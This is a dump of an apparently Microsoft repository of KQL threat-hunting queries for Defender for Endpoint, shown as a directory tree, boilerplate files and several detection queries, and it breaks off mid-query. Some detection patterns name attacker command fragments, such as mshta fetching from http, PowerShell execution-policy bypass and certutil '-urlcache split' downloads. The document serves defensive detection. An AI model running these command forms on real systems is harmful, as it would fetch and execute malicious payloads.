Repository: microsoft/WindowsDefenderATP-Hunting-Queries Branch: master Commit: efa17a600b43 Files: 386 Total size: 5.9 MB Directory structure: gitextract_10u3qxy0/ ├── .gitignore ├── 00-query-submission-template.md ├── CODE_OF_CONDUCT.md ├── Campaigns/ │ ├── APT Baby Shark.txt │ ├── APT29 thinktanks.txt │ ├── Abuse.ch Recent Threat Feed.md │ ├── Abusing settingcontent-ms.txt │ ├── Bazacall/ │ │ ├── Bazacall Emails.md │ │ ├── Cobalt Strike Lateral Movement.md │ │ ├── Dropping payload via certutil.md │ │ ├── Excel Macro Execution.md │ │ ├── Excel file download domain pattern.md │ │ ├── Malicious Excel Delivery.md │ │ ├── NTDS theft.md │ │ ├── Renamed Rclone Exfil.md │ │ └── RunDLL Suspicious Network Connection.md │ ├── Bazarloader/ │ │ ├── Stolen Images Execution.md │ │ ├── Zip-Doc - Creation of JPG Payload File.md │ │ └── Zip-Doc - Word Launching MSHTA.md │ ├── Bear Activity GTR 2019.txt │ ├── Cloud Hopper.txt │ ├── DofoilNameCoinServerTraffic.txt │ ├── Dopplepaymer In-Memory Malware Implant.txt │ ├── Dragon Fly.txt │ ├── Elise backdoor.txt │ ├── Equation Group C2 Communication.txt │ ├── Hurricane Panda activity.txt │ ├── Judgement Panda exfil activity.txt │ ├── Jupyter-Solarmaker/ │ │ ├── deimos-component-execution.md │ │ ├── evasive-powershell-executions.md │ │ ├── evasive-powershell-strings.md │ │ └── successive-tk-domain-calls.md │ ├── LemonDuck/ │ │ ├── LemonDuck-competition-killer.md │ │ ├── LemonDuck-component-download-structure.md │ │ ├── LemonDuck-component-names.md │ │ ├── LemonDuck-control-structure.md │ │ ├── LemonDuck-defender-exclusions.md │ │ ├── LemonDuck-email-subjects.md │ │ ├── LemonDuck-id-generation.md │ │ └── LemonDuck-registration-function.md │ ├── Log4J/ │ │ ├── Alerts related to Log4j vulnerability.md │ │ ├── Devices with Log4j vulnerability alerts and additional other alert related context.md │ │ ├── Suspicious JScript staging comment.md │ │ ├── Suspicious PowerShell curl flags.md │ │ └── Suspicious process event creation from VMWare Horizon TomcatService.md │ ├── MacOceanLotusBackdoor.txt │ ├── MacOceanLotusDropper.txt │ ├── Macaw Ransomware/ │ │ ├── Disable Controlled Folders.md │ │ ├── Imminent Ransomware.md │ │ ├── Inhibit recovery by disabling tools and functionality.md │ │ ├── Mass account password change.md │ │ ├── PSExec Attrib commands.md │ │ └── Use of MSBuild as LOLBin.md │ ├── OceanLotus registry activity.txt │ ├── Qakbot/ │ │ ├── Excel launching anomalous processes.md │ │ ├── General attempts to access local email store.md │ │ ├── Qakbot Craigslist Domains.md │ │ ├── Qakbot email theft.md │ │ └── Qakbot reconnaissance activities.md │ ├── Ransomware hits healthcare - Alternate Data Streams use.txt │ ├── Ransomware hits healthcare - Backup deletion.txt │ ├── Ransomware hits healthcare - Cipher.exe tool deleting data.txt │ ├── Ransomware hits healthcare - Clearing of system logs.txt │ ├── Ransomware hits healthcare - Possible compromised accounts.txt │ ├── Ransomware hits healthcare - Robbinhood activity.txt │ ├── Ransomware hits healthcare - Turning off System Restore.txt │ ├── Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt │ ├── StrRAT malware/ │ │ ├── StrRAT-AV-Discovery.md │ │ ├── StrRAT-Email-Delivery.md │ │ └── StrRAT-Malware-Persistence.md │ ├── Sysrv-botnet/ │ │ ├── app-armor-stopped.md │ │ ├── java-executing-cmd-to-run-powershell.md │ │ ├── kinsing-miner-download.md │ │ ├── oracle-webLogic-executing-powershell.md │ │ ├── rce-on-vulnerable-server.md │ │ └── tomcat-8-executing-powershell.md │ ├── Threat actor Phosphorus masquerading as conference organizers.md │ ├── WastedLocker Downloader.md │ ├── ZLoader/ │ │ ├── Malicious bat file.md │ │ ├── Payload Delivery.md │ │ └── Suspicious Registry Keys.md │ ├── apt sofacy zebrocy.txt │ ├── apt sofacy.txt │ ├── apt ta17 293a ps.txt │ ├── apt tropictrooper.txt │ ├── apt unidentified nov 18.txt │ ├── c2-lookup-from-nonbrowser[Nobelium].md │ ├── c2-lookup-response[Nobelium].md │ ├── cobalt-strike-invoked-w-wmi.md │ ├── compromised-certificate[Nobelium].md │ ├── confluence-weblogic-targeted.md │ ├── cypherpunk-exclusive-commands.md │ ├── cypherpunk-remote-exec-w-psexesvc.md │ ├── detect-cyzfc-activity.md │ ├── fireeye-red-team-tools-CVEs [Nobelium].md │ ├── fireeye-red-team-tools-HASHs [Nobelium].md │ ├── known-affected-software-orion[Nobelium].md │ ├── launching-base64-powershell[Nobelium].md │ ├── launching-cmd-echo[Nobelium].md │ ├── locate-dll-created-locally[Nobelium].md │ ├── locate-dll-loaded-in-memory[Nobelium].md │ ├── oceanlotus-apt32-files.md │ ├── oceanlotus-apt32-network.md │ ├── possible-affected-software-orion[Nobelium].md │ ├── robbinhood-driver.md │ ├── robbinhood-evasion.md │ ├── snip3-aviation-targeting-emails.md │ ├── snip3-detectsanboxie-function-call.md │ ├── snip3-encoded-powershell-structure.md │ ├── snip3-malicious-network-connectivity.md │ └── snip3-revengerat-c2-exfiltration.md ├── Collection/ │ ├── Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md │ ├── HostExportingMailboxAndRemovingExport[Solarigate].md │ └── MailItemsAccessedTimeSeries[Solarigate].md ├── Command and Control/ │ ├── C2-NamedPipe.md │ ├── Connection to Rare DNS Hosts.md │ ├── DNSPattern [Nobelium].md │ ├── Device network events w low count FQDN.txt │ ├── EncodedDomainURL [Nobelium].md │ ├── Tor.txt │ ├── c2-bluekeep.md │ ├── check-for-shadowhammer-activity-download-domain.md │ ├── python-use-by-ransomware-macos.md │ ├── recon-with-rundll.md │ └── reverse-shell-ransomware-macos.md ├── Credential Access/ │ ├── Active Directory Sensitive Group Modifications.md │ ├── Private Key Files.txt │ ├── cobalt-strike.md │ ├── doppelpaymer-procdump.md │ ├── identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md │ ├── lazagne.md │ ├── logon-attempts-after-malicious-email.md │ ├── procdump-lsass-credentials.md │ ├── wadhrama-credential-dump.md │ └── wdigest-caching.md ├── Defense evasion/ │ ├── ADFSDomainTrustMods[Nobelium].md │ ├── Discovering potentially tampered devices [Nobelium].md │ ├── MailPermissionsAddedToApplication[Nobelium].md │ ├── PotentialMicrosoftDefenderTampering[Solarigate].md │ ├── UpdateStsRefreshToken[Solorigate].md │ ├── alt-data-streams.md │ ├── clear-system-logs.md │ ├── deleting-data-w-cipher-tool.md │ ├── doppelpaymer-stop-services.md │ ├── hiding-java-class-file.md │ ├── locate-files-possibly-signed-by-fraudulent-ecc-certificates.md │ ├── qakbot-campaign-process-injection.md │ └── qakbot-campaign-self-deletion.md ├── Delivery/ │ ├── Doc attachment with link to download.txt │ ├── Dropbox downloads linked from other site.txt │ ├── Email link + download + SmartScreen warning.txt │ ├── Gootkit-malware.md │ ├── Open email link.txt │ ├── Pivot from detections to related downloads.txt │ ├── Qakbot Craigslist Domains.md │ ├── detect-jscript-file-creation.md │ └── powercat-download.md ├── Discovery/ │ ├── Detect-Not-Active-AD-User-Accounts.md │ ├── DetectTorRelayConnectivity.md │ ├── DetectTorrentUse.txt │ ├── Discover hosts doing possible network scans.txt │ ├── Enumeration of users & groups for lateral movement.txt │ ├── MultipleLdaps.md │ ├── MultipleSensitiveLdaps.md │ ├── PasswordSearch.md │ ├── PrevalentInteractiveLogons │ ├── Roasting.md │ ├── SMB shares discovery.txt │ ├── SensitiveLdaps.md │ ├── SuspiciousEnumerationUsingAdfind[Nobelium].md │ ├── URL Detection.txt │ ├── VulnComputers.md │ ├── detect-nbtscan-activity.md │ ├── detect-suspicious-commands-initiated-by-web-server-processes.md │ ├── doppelpaymer.md │ ├── qakbot-campaign-esentutl.md │ └── qakbot-campaign-outlook.md ├── Email Queries/ │ ├── Appspot Phishing Abuse.md │ ├── JNLP-File-Attachment.md │ ├── PhishingEmailUrlRedirector.md │ └── referral-phish-emails.md ├── Execution/ │ ├── Base64 Detector and Decoder.md │ ├── Base64encodePEFile.txt │ ├── Detect Encoded Powershell.md │ ├── Detect PowerShell v2 Downgrade.md │ ├── ExecuteBase64DecodedPayload.txt │ ├── File Copy and Execution.md │ ├── Malware_In_recyclebin.txt │ ├── Masquerading system executable.txt │ ├── Possible Ransomware Related Destruction Activity.md │ ├── PowerShell downloads.txt │ ├── PowershellCommand - uncommon commands on machine.txt │ ├── PowershellCommand footprint.txt │ ├── Webserver Executing Suspicious Applications.md │ ├── check-for-shadowhammer-activity-implant.md │ ├── detect-anomalous-process-trees.md │ ├── detect-bluekeep-related-mining.md │ ├── detect-doublepulsar-execution.md │ ├── detect-exploitation-of-cve-2018-8653.md │ ├── detect-malcious-use-of-msiexec.md │ ├── detect-malicious-rar-extraction.md │ ├── detect-office-products-spawning-wmic.md │ ├── detect-suspicious-mshta-usage.md │ ├── detect-web-server-exploit-doublepulsar.md │ ├── exchange-iis-worker-dropping-webshell.md │ ├── jse-launched-by-word.md │ ├── launch-questd-w-osascript.md │ ├── locate-shlayer-payload-decryption-activity.md │ ├── locate-shlayer-payload-decrytion-activity.md │ ├── locate-surfbuyer-downloader-decoding-activity.md │ ├── office-apps-launching-wscipt.md │ ├── powershell-activity-after-email-from-malicious-sender.md │ ├── powershell-version-2.0-execution.md │ ├── python-based-attacks-on-macos.md │ ├── qakbot-campaign-suspicious-javascript.md │ ├── reverse-shell-nishang-base64.md │ ├── reverse-shell-nishang.md │ ├── sql-server-abuse.md │ ├── umworkerprocess-creating-webshell.md │ └── umworkerprocess-unusual-subprocess-activity.md ├── Exfiltration/ │ ├── 7-zip-prep-for-exfiltration.md │ ├── Anomaly of MailItemAccess by GraphAPI [Nobelium].md │ ├── Data copied to other location than C drive.txt │ ├── Files copied to USB drives.md │ ├── MailItemsAccessed Throttling [Nobelium].md │ ├── Map external devices.txt │ ├── OAuth Apps accessing user mail via GraphAPI [Nobelium].md │ ├── OAuth Apps reading mail both via GraphAPI and directly [Nobelium].md │ ├── OAuth Apps reading mail via GraphAPI anomaly [Nobelium].md │ ├── Password Protected Archive Creation.md │ ├── Possible File Copy to USB Drive.md │ ├── detect-archive-exfiltration-to-competitor.md │ ├── detect-exfiltration-after-termination.md │ ├── detect-steganography-exfiltration.md │ └── exchange-powershell-snapin-loaded.md ├── Exploits/ │ ├── AcroRd-Exploits.txt │ ├── CVE-2021-36934 usage detection.md │ ├── Electron-CVE-2018-1000006.txt │ ├── Flash-CVE-2018-4848.txt │ ├── Linux-DynoRoot-CVE-2018-1111.txt │ ├── MosaicLoader.md │ ├── Print Spooler RCE/ │ │ ├── Spoolsv Spawning Rundll32.md │ │ ├── Suspicious DLLs in spool folder.md │ │ ├── Suspicious Spoolsv Child Process.md │ │ └── Suspicious files in spool folder.md │ ├── SolarWinds -CVE-2021-35211.md │ ├── printnightmare-cve-2021-1675 usage detection.md │ ├── winrar-cve-2018-20250-ace-files.md │ └── winrar-cve-2018-20250-file-creation.md ├── Fun/ │ ├── EmojiHunt.txt │ ├── HiddenMessage.txt │ └── Make FolderPath Vogon Poetry.md ├── General queries/ │ ├── Alert Events from Internal IP Address.txt │ ├── AppLocker Policy Design Assistant.md │ ├── Baseline Comparison.txt │ ├── Crashing Applications.md │ ├── Detect Azure RemoteIP.md │ ├── Device Count by DNS Suffix.md │ ├── Device uptime calculation.md │ ├── Endpoint Agent Health Status Report.md │ ├── Events surrounding alert.txt │ ├── Failed Logon Attempt.txt │ ├── File footprint.txt │ ├── Firewall Policy Design Assistant.md │ ├── MD AV Signature and Platform Version.md │ ├── MITRE - Suspicious Events.txt │ ├── Machine info from IP address.txt │ ├── Network footprint.txt │ ├── Network info of machine.txt │ ├── Phish and Malware received by user vs total amount of email.md │ ├── Services.txt │ ├── System Guard Security Level Baseline.txt │ ├── System Guard Security Level Drop.txt │ ├── insider-threat-detection-queries.md │ └── wifikeys.txt ├── Impact/ │ ├── backup-deletion.md │ ├── ransom-note-creation-macos.md │ ├── turn-off-system-restore.md │ └── wadhrama-data-destruction.md ├── Initial access/ │ ├── Check for Maalware Baazar (abuse.ch) hashes in your mail flow.md │ ├── Non_intended_user_logon.md │ ├── PhishingEmailUrlRedirector.md │ ├── SuspiciousUrlClicked.md │ ├── WhenZAPed.md │ ├── detect-bluekeep-exploitation-attempts.md │ ├── detect-mailsniper.md │ ├── files-from-malicious-sender.md │ ├── identify-potential-missed-phishing-email-campaigns.md │ └── jar-attachments.md ├── LICENSE ├── Lateral Movement/ │ ├── Account brute force.txt │ ├── Device Logons from Unknown IPs.txt │ ├── ImpersonatedUserFootprint.md │ ├── Network Logons with Local Accounts.md │ ├── Non-local logons with -500 account.txt │ ├── ServiceAccountsPerformingRemotePS.txt │ ├── detect-suspicious-rdp-connections.md │ ├── doppelpaymer-psexec.md │ └── remote-file-creation-with-psexec.md ├── M365-PowerBi Dashboard/ │ ├── Microsoft Threat Protection - API Dashboard.pbit │ └── readme.txt ├── Network/ │ └── Defender for Endpoint Telemetry.txt ├── Notebooks/ │ ├── M365D APIs ep3.ipynb │ ├── WDATP APIs Demo Notebook.ipynb │ └── mtp_hunting.ipynb ├── Persistence/ │ ├── Accessibility Features.txt │ ├── AddedCredentialFromContryXAndSigninFromCountryY.md │ ├── Create account.txt │ ├── CredentialsAddAfterAdminConsentedToApp[Nobelium].md │ ├── LocalAdminGroupChanges.txt │ ├── NewAppOrServicePrincipalCredential[Nobelium].md │ ├── Possible webshell drop.md │ ├── detect-prifou-pua.md │ ├── localAdminAccountLogon.txt │ ├── qakbot-campaign-registry-edit.md │ ├── scheduled task creation.txt │ └── wadhrama-ransomware.md ├── Privilege escalation/ │ ├── Add uncommon credential type to application [Nobelium].md │ ├── SAM-Name-Changes-CVE-2021-42278.md │ ├── ServicePrincipalAddedToRole [Nobelium].md │ ├── cve-2019-0808-c2.md │ ├── cve-2019-0808-nufsys-file creation.md │ ├── cve-2019-0808-set-scheduled-task.md │ ├── dell-driver-vulnerability-2021.md │ ├── detect-cve-2019-0863-AngryPolarBearBug2-exploit.md │ ├── detect-cve-2019-0973-installerbypass-exploit.md │ ├── detect-cve-2019-1053-sandboxescape-exploit.md │ ├── detect-cve-2019-1069-bearlpe-exploit.md │ ├── detect-cve-2019-1129-byebear-exploit.md │ └── locate-ALPC-local-privilege-elevation-exploit.md ├── Protection events/ │ ├── AV Detections with Source.txt │ ├── AV Detections with USB Disk Drive.txt │ ├── Antivirus detections.txt │ ├── ExploitGuardASRStats.txt │ ├── ExploitGuardAsrDescriptions.txt │ ├── ExploitGuardBlockOfficeChildProcess.txt │ ├── ExploitGuardControlledFolderAccess.txt │ ├── ExploitGuardNetworkProtectionEvents.txt │ ├── ExploitGuardStats.txt │ ├── PUA ThreatName per Computer.txt │ ├── README.md │ ├── SmartScreen URL block ignored by user.txt │ ├── SmartScreen app block ignored by user.txt │ ├── Windows filtering events (Firewall).txt │ └── WindowsDefenderAVEvents.txt ├── README.md ├── Ransomware/ │ ├── Backup deletion.md │ ├── Check for multiple signs of ransomware activity.md │ ├── Clearing of forensic evidence from event logs using wevtutil.md │ ├── DarkSide.md │ ├── Deletion of data on multiple drives using cipher exe.md │ ├── Discovery for highly-privileged accounts.md │ ├── Distribution from remote location.md │ ├── Fake Replies.md │ ├── File Backup Deletion Alerts.md │ ├── Gootkit File Delivery.md │ ├── HTA Startup Persistence.md │ ├── IcedId Delivery.md │ ├── IcedId attachments.md │ ├── IcedId email delivery.md │ ├── LaZagne Credential Theft.md │ ├── Potential ransomware activity related to Cobalt Strike.md │ ├── Qakbot discovery activies.md │ ├── Sticky Keys.md │ ├── Stopping multiple processes using taskkill.md │ ├── Stopping processes using net stop.md │ ├── Suspicious Bitlocker Encryption.md │ ├── Suspicious Google Doc Links.md │ ├── Suspicious Image Load related to IcedId.md │ ├── Turning off System Restore.md │ └── Turning off services using sc exe.md ├── SECURITY.md ├── TVM/ │ └── devices_with_vuln_and_users_received_payload.md ├── Troubleshooting/ │ ├── Connectivity Failures by Device.md │ └── Connectivity Failures by Domain.md └── Webcasts/ ├── Airlift 2021 - Lets Invoke.csl ├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt ├── README.md ├── TrackingTheAdversary/ │ ├── Episode 1 - KQL Fundamentals.txt │ ├── Episode 2 - Joins.txt │ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt │ ├── Episode 4 - Lets Hunt.txt │ └── README.md └── l33tSpeak/ ├── MCAS - The Hunt.txt ├── Performance, Json and dynamics operator, external data.txt └── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. ## ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore # User-specific files *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ bld/ [Bb]in/ [Oo]bj/ [Ll]og/ # Visual Studio 2015 cache/options directory .vs/ # Uncomment if you have tasks that create the project's static files in wwwroot #wwwroot/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUNIT *.VisualState.xml TestResult.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # .NET Core project.lock.json project.fragment.lock.json artifacts/ **/Properties/launchSettings.json *_i.c *_p.c *_i.h *.ilk *.meta *.obj *.pch *.pdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *.log *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opendb *.opensdf *.sdf *.cachefile *.VC.db *.VC.VC.opendb # Visual Studio profiler *.psess *.vsp *.vspx *.sap # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # JustCode is a .NET coding add-in .JustCode # TeamCity is a build add-in _TeamCity* # DotCover is a Code Coverage Tool *.dotCover # Visual Studio code coverage results *.coverage *.coveragexml # NCrunch _NCrunch_* .*crunch*.local.xml nCrunchTemp_* # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # TODO: Comment the next line if you want to checkin your web deploy settings # but database connection strings (with potential passwords) will be unencrypted *.pubxml *.publishproj # Microsoft Azure Web App publish settings. Comment the next line if you want to # checkin your Azure Web App publish settings, but sensitive information contained # in these scripts will be unencrypted PublishScripts/ # NuGet Packages *.nupkg # The packages folder can be ignored because of Package Restore **/packages/* # except build/, which is used as an MSBuild target. !**/packages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/packages/repositories.config # NuGet v3's project.json files produces more ignorable files *.nuget.props *.nuget.targets # Microsoft Azure Build Output csx/ *.build.csdef # Microsoft Azure Emulator ecf/ rcf/ # Windows Store app package directories and files AppPackages/ BundleArtifacts/ Package.StoreAssociation.xml _pkginfo.txt # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !*.[Cc]ache/ # Others ClientBin/ ~$* *~ *.dbmdl *.dbproj.schemaview *.jfm *.pfx *.publishsettings orleans.codegen.cs # Since there are multiple workflows, uncomment next line to ignore bower_components # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) #bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm # SQL Server files *.mdf *.ldf *.ndf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings # Microsoft Fakes FakesAssemblies/ # GhostDoc plugin setting file *.GhostDoc.xml # Node.js Tools for Visual Studio .ntvs_analysis.dat node_modules/ # Typescript v1 declaration files typings/ # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) *.vbw # Visual Studio LightSwitch build output **/*.HTMLClient/GeneratedArtifacts **/*.DesktopClient/GeneratedArtifacts **/*.DesktopClient/ModelManifest.xml **/*.Server/GeneratedArtifacts **/*.Server/ModelManifest.xml _Pvt_Extensions # Paket dependency manager .paket/paket.exe paket-files/ # FAKE - F# Make .fake/ # JetBrains Rider .idea/ *.sln.iml # CodeRush .cr/ # Python Tools for Visual Studio (PTVS) __pycache__/ *.pyc # Cake - Uncomment if you are using it # tools/** # !tools/packages.config # Telerik's JustMock configuration file *.jmconfig # BizTalk build output *.btp.cs *.btm.cs *.odx.cs *.xsd.cs ================================================ FILE: 00-query-submission-template.md ================================================ # < Insert query name > < Provide query description and usage tips > ## Query ``` < Insert query string here > ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** < your name > **GitHub alias:** < your github alias > **Organization:** < your org > **Contact info:** < email or website > ================================================ FILE: CODE_OF_CONDUCT.md ================================================ # Microsoft Open Source Code of Conduct This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). Resources: - [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/) - [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) - Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns ================================================ FILE: Campaigns/APT Baby Shark.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default""" or ProcessCommandLine startswith "powershell.exe mshta.exe http" or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe" | top 100 by Timestamp desc ================================================ FILE: Campaigns/APT29 thinktanks.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine has "-noni -ep bypass $" | top 100 by Timestamp desc ================================================ FILE: Campaigns/Abuse.ch Recent Threat Feed.md ================================================ # Abuse.ch Recent Threat Feed This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using the MaxAge variable. ## Query ``` let MaxAge = ago(1d); let AbuseFeed = materialize ( (externaldata(report:string) [@"https://bazaar.abuse.ch/export/csv/recent/"] with (format = "txt")) | where report !startswith '#' | extend report = parse_csv(report) | extend FirstSeenUtc = tostring(report[0]) | project FirstSeenUtc = todatetime(FirstSeenUtc) ,SHA256 = trim('[ "]+',tostring(report[1])) , MD5 = trim('[ "]+',tostring(report[2])) , SHA1 = trim('[ "]+',tostring(report[3])) , Reporter = trim('[ "]+',tostring(report[4])) , FileName = trim('[ "]+',tostring(report[5])) , FileType = trim('[ "]+',tostring(report[6])) , MimeType = trim('[ "]+',tostring(report[7])) , Signer = iff(report[8] == 'n/a', '', trim('[ "]+',tostring(report[8]))) , ClamAV = iff(report[9] == 'n/a', '', trim('[ "]+',tostring(report[9]))) , VTPercent = iff(report[10] == 'n/a', 0.0, todouble(report[10])) , ImpHash = iff(report[11] == 'n/a', '', trim('[ "]+',tostring(report[11]))) , SSDeep = iff(report[12] == 'n/a', '', trim('[ "]+',tostring(report[12]))) , TLSH = iff(report[13] == 'n/a', '', trim('[ "]+',tostring(report[13]))) ); union ( AbuseFeed | join ( DeviceProcessEvents | where Timestamp > MaxAge ) on SHA256 ), ( AbuseFeed | join ( DeviceFileEvents | where Timestamp > MaxAge ) on SHA256 ), ( AbuseFeed | join ( DeviceImageLoadEvents | where Timestamp > MaxAge ) on SHA256 ) ``` ...or if you don't care about the details from Malware Bazaar you might consider this slightly more lightweight version ``` let MaxAge = ago(1d); let AbuseFeed = toscalar ( (externaldata(report:string) [@"https://bazaar.abuse.ch/export/txt/sha256/recent/"] with (format = "txt")) | where report !startswith '#' | summarize make_set(report) ); union ( DeviceProcessEvents | where Timestamp > MaxAge and SHA256 in (AbuseFeed) ), ( DeviceFileEvents | where Timestamp > MaxAge and SHA256 in (AbuseFeed) ), ( DeviceImageLoadEvents | where Timestamp > MaxAge and SHA256 in (AbuseFeed) ) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | v | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Exploit | v | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | v | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Campaigns/Abusing settingcontent-ms.txt ================================================ // Sample query that search for .settingcontent-ms that has been downloaded from the web // through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook // For questions @MiladMSFT on Twitter or milad.aslaner@microsoft.com DeviceFileEvents | where InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe", "outlook.exe") | where FileName endswith ".settingcontent-ms" // The FileOrigin* columns are available only on Edge and Chrome and from Windows 10 version 1703 // https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454 | project Timestamp, DeviceName, FileName, FolderPath, FileOriginUrl, FileOriginReferrerUrl, FileOriginIP ================================================ FILE: Campaigns/Bazacall/Bazacall Emails.md ================================================ # Bazacall emails Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to trick users into contacting the number included in the email. ## Query This query looks for the subject lines associated with known Bazacall emails, using a regex to match on the fake account number pattern and a few keywords that are frequently used in these subjects. NOTE: Some emails contain the fake account number in the body of the email rather than the subject. In these instances, searching on keyword alone may surface related emails. Verify maliciousness by matching the regex for the account number in the body of the email if possible. ``` EmailEvents | where Subject matches regex @"[A-Z]{1,3}\d{9,15}" and Subject has_any('trial', 'free', 'demo', 'membership', 'premium', 'gold', 'notification', 'notice', 'claim', 'order', 'license', 'licenses') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Cobalt Strike Lateral Movement.md ================================================ # Bazacall Cobalt Strike Lateral Movement Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network. ## Query This query looks for alerts related to Cobalt Strike and its built-in PSExec used for lateral movement. ``` AlertInfo | where Title in("File dropped and launched from remote location", "Suspicious transfer of an executable file") // Joining in instances where Cobalt Strike's built-in PsExec is used for lateral movement | join AlertEvidence on $left.AlertId == $right.AlertId | where FileName matches regex @"^([a-z0-9]){7}\.exe$" and FileName matches regex "[0-9]{1,5}" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Dropping payload via certutil.md ================================================ # BazaCall dropping payload via certutil.exe BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader. This query hunts for an attacker-created copy of *certutil.exe*, a legitimate process, which the macro uses to download BazaLoader. ## Query ```kusto DeviceFileEvents | where InitiatingProcessFileName !~ "certutil.exe" | where InitiatingProcessFileName !~ "cmd.exe" | where InitiatingProcessCommandLine has_all("-urlcache", "split", "http") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, 